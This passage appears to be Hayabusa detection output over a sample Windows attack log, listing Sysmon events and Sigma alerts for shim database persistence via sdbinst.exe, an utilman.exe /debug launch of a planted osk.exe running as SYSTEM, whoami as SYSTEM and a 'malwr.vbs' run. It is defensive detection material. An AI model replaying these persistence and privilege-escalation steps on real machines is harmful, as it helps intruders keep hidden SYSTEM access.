365ABB72-569F-5C91-0000-0010036C0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 
2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3140 | PGUID: 365ABB72-569F-5C91-0000-0010D96C0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.484 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3312 | PGUID: 365ABB72-56A2-5C91-0000-0010D2770800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3176 | PGUID: 
365ABB72-5765-5C91-0000-001039030900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.014 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.044 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.044 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 384 | PGUID: 365ABB72-57F4-5C91-0000-0010F0910900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2892 | PGUID: 365ABB72-57F4-5C91-0000-001083920900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3700 | PGUID: 365ABB72-57F4-5C91-0000-001070930900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2604 | PGUID: 365ABB72-57F4-5C91-0000-0010BB9C0900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:31.860 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-57FB-5C91-0000-00104FD40900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\osk.exe"" | LID: 0x3e7 | PID: 2456 | PGUID: 365ABB72-5804-5C91-0000-001044DE0900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2772 | PGUID: 365ABB72-5851-5C91-0000-0010E1030A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\wsqmcons.exe | LID: 0x3e7 | PID: 2716 | PGUID: 365ABB72-5851-5C91-0000-00107D050A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 792 | PGUID: 365ABB72-5ACA-5C91-0000-0010DC1E0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2884 | PGUID: 365ABB72-5CBE-5C91-0000-001017150C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3856 | PGUID: 365ABB72-5CC1-5C91-0000-0010DD2F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,../hayabusa-rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,../hayabusa-rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3568 | PGUID: 365ABB72-5D41-5C91-0000-0010D9080F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\System32\rundll32.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3840 | PGUID: 365ABB72-5D94-5C91-0000-001080E90F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" | Process: C:\Program Files\Windows NT\Accessories\wordpad.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | LID: 0x33435 | PID: 900 | PGUID: 365ABB72-5D99-5C91-0000-001051FA0F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2600 | PGUID: 365ABB72-5E6D-5C91-0000-001073BA1000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2760 | PGUID: 365ABB72-5E70-5C91-0000-00107EBE1000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 572 | PGUID: 365ABB72-5F99-5C91-0000-0010B5421100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 1748 | PGUID: 365ABB72-60C5-5C91-0000-001061C31100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2400 | PGUID: 365ABB72-61F1-5C91-0000-0010554C1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3364 | PGUID: 365ABB72-61F7-5C91-0000-001032511200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2340 | PGUID: 365ABB72-61FD-5C91-0000-0010536A1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 3668 | PGUID: 365ABB72-61FD-5C91-0000-0010E26A1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2952 | PGUID: 365ABB72-61FE-5C91-0000-001035771200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\servicing\TrustedInstaller.exe | Process: C:\Windows\servicing\TrustedInstaller.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-61FE-5C91-0000-0010DF7F1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-777E-5C91-0000-00102B4B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-777E-5C91-0000-0010864D0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-777F-5C91-0000-00105E500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-777F-5C91-0000-001079500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-777F-5C91-0000-0010BF500000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 456 | PGUID: 365ABB72-777F-5C91-0000-0010D8520000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-777F-5C91-0000-00100B590000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 524 | PGUID: 365ABB72-777F-5C91-0000-0010B95B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 532 | PGUID: 365ABB72-777F-5C91-0000-0010EA5B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 640 | PGUID: 365ABB72-7780-5C91-0000-00103C730000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 704 | PGUID: 365ABB72-7780-5C91-0000-0010CFB00000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
